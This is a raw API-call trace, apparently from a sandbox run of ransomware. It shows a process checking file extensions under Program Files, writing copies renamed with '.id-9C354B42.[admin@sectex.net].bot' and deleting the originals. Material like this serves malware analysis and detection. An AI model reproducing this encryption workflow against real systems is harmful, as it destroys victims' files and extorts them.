	[0138.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61
	[0138.468] lstrlenW (lpString=".dbf") returned 4
	[0138.468] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0138.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61
	[0138.468] lstrlenW (lpString=".1cd") returned 4
	[0138.468] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0138.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61
	[0138.469] lstrlenW (lpString=".jpg") returned 4
	[0138.469] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0138.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61
	[0138.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61
	[0138.469] lstrlenW (lpString=".doc") returned 4
	[0138.469] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.469] lstrlenW (lpString=".docx") returned 5
	[0138.469] lstrcmpiW (lpString1=".docx", lpString2="v.xml") returned -1
	[0138.469] lstrlenW (lpString=".pdf") returned 4
	[0138.469] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.469] lstrlenW (lpString=".xls") returned 4
	[0138.469] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.469] lstrlenW (lpString=".xlsx") returned 5
	[0138.469] lstrcmpiW (lpString1=".xlsx", lpString2="v.xml") returned -1
	[0138.469] lstrlenW (lpString=".ppt") returned 4
	[0138.469] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61
	[0138.469] lstrlenW (lpString=".zip") returned 4
	[0138.469] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.469] lstrlenW (lpString=".rar") returned 4
	[0138.469] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.469] lstrlenW (lpString=".bz2") returned 4
	[0138.469] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.469] lstrlenW (lpString=".7z") returned 3
	[0138.469] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0138.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61
	[0138.469] lstrlenW (lpString=".dbf") returned 4
	[0138.469] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0138.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61
	[0138.469] lstrlenW (lpString=".1cd") returned 4
	[0138.469] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0138.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61
	[0138.469] lstrlenW (lpString=".jpg") returned 4
	[0138.470] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0138.470] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0138.470] lstrlenW (lpString="ipsita.xml") returned 10
	[0138.470] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324
	[0138.470] GetFileSizeEx (in: hFile=0x324, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2526) returned 1
	[0138.470] CloseHandle (hObject=0x324) returned 1
	[0138.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml")) returned 0x20
	[0138.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.470] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61
	[0138.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61
	[0138.470] lstrlenW (lpString=".doc") returned 4
	[0138.470] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.470] lstrlenW (lpString=".docx") returned 5
	[0138.471] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1
	[0138.471] lstrlenW (lpString=".pdf") returned 4
	[0138.471] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.471] lstrlenW (lpString=".xls") returned 4
	[0138.471] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.471] lstrlenW (lpString=".xlsx") returned 5
	[0138.471] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1
	[0138.471] lstrlenW (lpString=".ppt") returned 4
	[0138.471] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61
	[0138.471] lstrlenW (lpString=".zip") returned 4
	[0138.471] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.471] lstrlenW (lpString=".rar") returned 4
	[0138.471] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.471] lstrlenW (lpString=".bz2") returned 4
	[0138.471] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.471] lstrlenW (lpString=".7z") returned 3
	[0138.471] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0138.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61
	[0138.471] lstrlenW (lpString=".dbf") returned 4
	[0138.471] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0138.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61
	[0138.471] lstrlenW (lpString=".1cd") returned 4
	[0138.471] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0138.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61
	[0138.471] lstrlenW (lpString=".jpg") returned 4
	[0138.471] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0138.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61
	[0138.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61
	[0138.471] lstrlenW (lpString=".doc") returned 4
	[0138.471] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.471] lstrlenW (lpString=".docx") returned 5
	[0138.471] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1
	[0138.471] lstrlenW (lpString=".pdf") returned 4
	[0138.471] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.472] lstrlenW (lpString=".xls") returned 4
	[0138.472] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.472] lstrlenW (lpString=".xlsx") returned 5
	[0138.472] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1
	[0138.472] lstrlenW (lpString=".ppt") returned 4
	[0138.472] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61
	[0138.472] lstrlenW (lpString=".zip") returned 4
	[0138.472] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.472] lstrlenW (lpString=".rar") returned 4
	[0138.472] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.472] lstrlenW (lpString=".bz2") returned 4
	[0138.472] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.472] lstrlenW (lpString=".7z") returned 3
	[0138.472] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0138.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61
	[0138.472] lstrlenW (lpString=".dbf") returned 4
	[0138.472] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0138.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61
	[0138.472] lstrlenW (lpString=".1cd") returned 4
	[0138.472] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0138.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61
	[0138.472] lstrlenW (lpString=".jpg") returned 4
	[0138.472] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0138.472] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0138.472] lstrlenW (lpString="ipsjpn.xml") returned 10
	[0138.472] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324
	[0138.473] GetFileSizeEx (in: hFile=0x324, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2522) returned 1
	[0138.473] CloseHandle (hObject=0x324) returned 1
	[0138.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml")) returned 0x20
	[0138.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.473] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 61
	[0138.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 61
	[0138.473] lstrlenW (lpString=".doc") returned 4
	[0138.473] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.473] lstrlenW (lpString=".docx") returned 5
	[0138.473] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1
	[0138.473] lstrlenW (lpString=".pdf") returned 4
	[0138.473] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.473] lstrlenW (lpString=".xls") returned 4
	[0138.473] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.473] lstrlenW (lpString=".xlsx") returned 5
	[0138.473] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1
	[0138.473] lstrlenW (lpString=".ppt") returned 4
	[0139.219] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.219] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75
	[0139.219] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75
	[0139.219] lstrlenW (lpString=".doc") returned 4
	[0139.223] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.223] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79
	[0139.223] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79
	[0139.223] lstrlenW (lpString=".doc") returned 4
	[0139.224] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.224] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82
	[0139.225] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.225] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.225] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.226] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.227] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.227] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.228] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.767] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.767] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0139.805] GetLastError () returned 0x0
	[0139.805] ReadFile (in: hFile=0x37c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xc9c, lpOverlapped=0x0) returned 1
	[0139.812] WriteFile (in: hFile=0x3a8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xca0, lpOverlapped=0x0) returned 1
	[0139.813] ReadFile (in: hFile=0x37c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.813] WriteFile (in: hFile=0x3a8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0139.814] SetEndOfFile (hFile=0x3a8) returned 1
	[0139.814] CloseHandle (hObject=0x3a8) returned 1
	[0139.814] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.814] SetEndOfFile (hFile=0x37c) returned 1
	[0139.824] CloseHandle (hObject=0x37c) returned 1
	[0139.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.833] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf")) returned 1
	[0139.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63
	[0139.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63
	[0139.833] lstrlenW (lpString=".doc") returned 4
	[0139.833] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.833] lstrlenW (lpString=".docx") returned 5
	[0139.834] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.834] lstrlenW (lpString=".pdf") returned 4
	[0139.834] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.834] lstrlenW (lpString=".xls") returned 4
	[0139.834] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.834] lstrlenW (lpString=".xlsx") returned 5
	[0139.834] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.834] lstrlenW (lpString=".ppt") returned 4
	[0139.834] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63
	[0139.834] lstrlenW (lpString=".zip") returned 4
	[0139.834] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.834] lstrlenW (lpString=".rar") returned 4
	[0139.834] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.834] lstrlenW (lpString=".bz2") returned 4
	[0139.834] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.834] lstrlenW (lpString=".7z") returned 3
	[0139.834] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63
	[0139.834] lstrlenW (lpString=".dbf") returned 4
	[0139.834] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63
	[0139.834] lstrlenW (lpString=".1cd") returned 4
	[0139.834] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63
	[0139.834] lstrlenW (lpString=".jpg") returned 4
	[0139.834] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63
	[0139.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63
	[0139.834] lstrlenW (lpString=".doc") returned 4
	[0139.834] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.834] lstrlenW (lpString=".docx") returned 5
	[0139.835] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.835] lstrlenW (lpString=".pdf") returned 4
	[0139.835] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.835] lstrlenW (lpString=".xls") returned 4
	[0139.835] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.835] lstrlenW (lpString=".xlsx") returned 5
	[0139.835] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.835] lstrlenW (lpString=".ppt") returned 4
	[0139.835] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63
	[0139.835] lstrlenW (lpString=".zip") returned 4
	[0139.835] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.835] lstrlenW (lpString=".rar") returned 4
	[0139.835] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.835] lstrlenW (lpString=".bz2") returned 4
	[0139.835] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.835] lstrlenW (lpString=".7z") returned 3
	[0139.835] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63
	[0139.835] lstrlenW (lpString=".dbf") returned 4
	[0139.835] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63
	[0139.835] lstrlenW (lpString=".1cd") returned 4
	[0139.835] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63
	[0139.835] lstrlenW (lpString=".jpg") returned 4
	[0139.835] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.835] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0139.835] lstrlenW (lpString="BD00116_.WMF") returned 12
	[0139.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0139.872] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=4870) returned 1
	[0139.872] CloseHandle (hObject=0x398) returned 1
	[0139.884] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf")) returned 0x20
	[0139.941] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0139.965] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.965] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0139.971] GetLastError () returned 0x0
